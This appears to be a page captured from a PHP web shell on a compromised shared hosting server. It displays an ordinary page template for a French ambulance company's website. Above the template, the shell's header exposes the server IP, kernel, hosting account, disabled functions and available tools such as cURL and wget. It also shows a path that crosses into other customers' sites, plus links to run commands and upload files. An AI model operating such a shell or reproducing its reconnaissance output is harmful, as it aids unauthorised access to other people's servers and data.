|
Server IP : 10.111.40.2 / Your IP : 216.73.217.145 Web Server : Apache System : Linux webd002.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : comimage ( 586) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/comimage/gletconstructions.com/../mailcemm/../maelambulance.fr/js/../themes/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
//****************************************************************************************
// NE PAS TOUCHER A LA STRUCTURE DE LA TEMPLATE !
//****************************************************************************************
?>
<div id="page-main" class="<?php echo $body_class; ?>">
<?php include(RACINE_INTERFACE."/inc-top.php"); ?>
<div id="central">
<div id="ttl" class="wrapper">
<h1><?php echo $h1; ?></h1>
<div class="deco">
<img src="images/deco_ttl.png" width="240" height="111" alt="Maël ambulance à Carhaix ">
</div>
</div>
<!-- ttl -->
<div class="wrapper cont-top">
<div class="ph">
<?php echo getGal('medium', 1, 1, 'groupe', 1, '');?>
</div>
<!-- ph -->
<div class="txt">
<?php echo getContent($bdd, $web, $model_p, 0); ?>
</div>
<!-- txt -->
<div class="clear"></div>
</div>
<!-- cont-top -->
<div class="cont-center">
<div class="wrapper">
<div class="txt">
<?php echo getContent($bdd, $web, $model_p, 1); ?>
</div>
<!--txt -->
<div class="ambu">
<img src="images/ambulance.png" width="506" height="332" alt="Maël ambulance à Carhaix"/>
</div>
<!-- ambu -->
</div>
</div>
<!-- cont-center -->
<div class="cont-bot">
<div class="wrapper photos">
<?php echo '<ul>'.getGal('thumbs', '(2-5)', 1, 'groupe', 1, 'li').'</ul>'; ?>
</div>
</div>
</div>
<!-- central -->
<?php include(RACINE_INTERFACE."/inc-footer.php"); ?>
</div>
<!-- page-main -->
